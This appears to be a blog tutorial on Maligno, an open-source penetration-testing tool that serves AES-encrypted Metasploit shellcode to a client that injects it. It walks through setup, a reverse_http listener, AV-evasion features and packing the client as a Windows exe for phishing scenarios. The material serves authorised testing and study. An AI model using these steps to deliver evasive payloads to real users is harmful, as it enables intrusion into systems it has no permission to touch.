Today I want show you a new tool that could help in your penetration testing activity. Maligno is an open source penetration-testing tool under the FreeBSD license, written in Python for maximum compatibility with Metasploit.

It uses the Metasploit framework, in particular msfvenom, to generate the shellcode AES encrypted and encoded prior to transmission.

Maligno is a very useful tool. It’s designed for penetration testing but it can also be used in a number of different scenarios. The communication with Maligno is very flexible, allowing it to simulate malware behavior or traffic patterns.

The architecture of Maligno is composed of client and server. Maligno communicates with its components using the HTTP and HTTPS protocol.

The configuration of the client-server can be set to simulate specific C&C communications, or used as part of adversary replication engagements.

The client can connect to Maligno in order to download Metasploit encrypted payload. When the shellcode is downloaded, the client decodes and decrypts it and then injects in the target machine.

The client is an extended version of David Kennedy’s PyInjector. It supports various OSs, such as Linux, Windows, and OS X. The Maligno client already has everything you need for specific clients and for specific payloads. It comes with an obfuscator that scrambles the code when generated.

Another nice function of Maligno is the delayed execution of payload, evading heuristic AV control.

The server component relies on Metasploit to do the hard work; in fact it can generate dynamic payloads with msfvenom for several type of victims. It also support multi payloads and multi-server connectivity. Thanks to the auxiliary module of Metasploit, it support Socks5a proxy.

If you want spread your payloads within a specific IP or network, Maligno support scopes. If the request doesn’t find any scopes configured on the configuration file server, you can configure a “Last Resort Redirection” that doesn’t allow it to serve a payload to a target that is out of scope.

Installation

The installation is very simple: you can download it directly here:

Unzip the file and execute the install script.

1. # ./install.sh

It asks you to answer to some questions about the creation of certificates to operate in ssl mode.

Configuration

After the installation finish, you can modify the configuration file server, open it and change with your payloads and IP.

There’s a full explanation of config file here:

# cat docs/server_config.explained

Creating of clients scripts

# ./clientgen.py -f youconfifileserver.xml -s true

This command generates Python scripts for each payload configured in your youconfifileserver.xml

Start the Maligno server

# ./maligno_srv.py

Metasploit listener

Now we move to the msfresources folder inside the Maligno folder to start the Metasploit listener. Maligno helps us create a simple script for each payload in order to load it quickly.

# cd msfresources
# msfconsole -r 0_standard_reverse_http_192.168.226.139_4444.rc

Now we have the Maligno environment up and running.

In a real scenario, we can’t phish a user and convince him to install all the environments for running a Python script. We have to transform a Python script to exe.

Transform a Python script to exe

After the creation of the Maligno Python script, we have to transform it for most usable case scenario.

We need the following software:

  • Python 2.7 32bit for windows
  • Pyinstaller 2.1
  • PyWin32 32bit
  • VM Windows 7 32/64

Install Python 2.7 on own Windows client machine. Download it from the original source https://www.Python.org/downloads/release/ and install it.

Next, open a CMD shell and go to the scripts directory inside C:\Python27\

C:\Python27\Scripts\pip.exe install pyinstaller

or if you have install the Python path on Windows environments variables.

C:\pip.exe install pyinstaller

Download the last version of Pyinstaller and after install it automatically.

Now it’s time to install PyWin32. As before, if you choose the msi installer, you have to click next until the end. The default settings are correct; it reads win variables to find the install path of Python.

It is important to install crypto module for decripting the payload in downloading phase.

C:\easy_install.exe crypto
C:\easy_install.exe pycrypto

Now we are ready to create our own exe from the Python script.

Open the Linux attack machine (where we have created a Maligno server) and choose a script to copy and paste in a folder you choose on Windows VM.

Move to folder and launch the pyinstaller

C:\pyinstaller.exe -F -w --onefile 0_standard_reverse_http.py

If there is no error, pyinstaller creates a folder named dist navigate into and we can find the .exe use it for testing your multistage payload.

Cheers!

Resources:

Maligno v2.2 is distributed by Encripto and downloadable for free at

https://www.encripto.no/nb/downloads/tools/

https://www.encripto.no